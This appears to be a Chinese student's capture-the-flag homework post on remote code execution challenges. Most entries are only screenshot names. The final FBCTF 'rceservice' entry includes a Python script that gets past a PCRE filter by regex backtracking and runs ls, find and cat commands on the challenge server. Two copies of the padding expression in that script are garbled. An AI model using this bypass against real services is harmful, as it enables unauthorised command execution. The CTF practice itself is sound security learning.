rce作业

一 [SWPUCTF 2021 新生赛]easyrce
屏幕截图_18-1-2026_19446_blog.csdn.net

二 [SWPUCTF 2021 新生赛]babyrce
屏幕截图_18-1-2026_194528_blog.csdn.net

三 [SWPUCTF 2021 新生赛]finalrce
屏幕截图_18-1-2026_194620_blog.csdn.net

四 [SWPUCTF 2023 秋季新生赛]RCE-PLUS
屏幕截图_18-1-2026_194650_blog.csdn.net

五 [SWPUCTF 2022 新生赛]ez_rce
屏幕截图_18-1-2026_19487_blog.csdn.net

六 简单rce
屏幕截图_18-1-2026_194839_blog.csdn.net

七 polar rce1
屏幕截图_18-1-2026_194931_blog.csdn.net
屏幕截图_18-1-2026_194959_blog.csdn.net

八 bllbl_rce
屏幕截图_18-1-2026_19511_blog.csdn.net
屏幕截图_18-1-2026_195112_blog.csdn.net

九 [极客大挑战 2019]RCE ME1
屏幕截图_18-1-2026_195232_blog.csdn.net
屏幕截图_18-1-2026_195251_blog.csdn.net
最后读取readflag,得到flag

十 [NSSRound#16 Basic]了解过PHP特性吗
屏幕截图_18-1-2026_195439_mp.csdn.net
屏幕截图_18-1-2026_195450_mp.csdn.net
屏幕截图_18-1-2026_195458_mp.csdn.net

十一 [NISACTF 2022]middlerce
屏幕截图_18-1-2026_195618_mp.csdn.net

十二 [SWPUCTF 2021 新生赛]hardrce_3
屏幕截图_18-1-2026_195735_mp.csdn.net
屏幕截图_18-1-2026_195741_mp.csdn.net

十三 [NSSRound#16 Basic]RCE但是没有完全RCE
屏幕截图_18-1-2026_195833_mp.csdn.net
屏幕截图_18-1-2026_195845_mp.csdn.net
屏幕截图_18-1-2026_195859_mp.csdn.net

十四 [ThinkPHP]5.0.23-Rce1
屏幕截图_18-1-2026_195952_mp.csdn.net
屏幕截图_18-1-2026_2003_mp.csdn.net

十五 [FBCTF 2019]rceservice
屏幕截图_18-1-2026_20127_node4.anna.nssctf.cn
这题仍然可以使用PCRE回溯机制绕过,于是编制脚本
import requests
payload = '{"cmd":"ls /", "abc":"'+'a'1000000+'"}'
res = requests.post("http://node4.anna.nssctf.cn:23484/",data = {"cmd":payload})
print(res.text)
得到
屏幕截图 2026-01-18 200352
没有发现flag文件,改脚本为payload = '{"cmd":"/usr/bin/find / -name flag", "abc":"'+'a'1000000+'"}'去寻找flag,得到
屏幕截图 2026-01-18 200809
更改脚本去打开文件
payload = '{"cmd":"/bin/cat /home/rceservice/flag", "abc":"'+'a'*1000000+'"}'
得到屏幕截图 2026-01-18 200932

posted @ 2026-01-18 20:10  ( ̄(エ) ̄)  阅读(7)  评论(0)    收藏  举报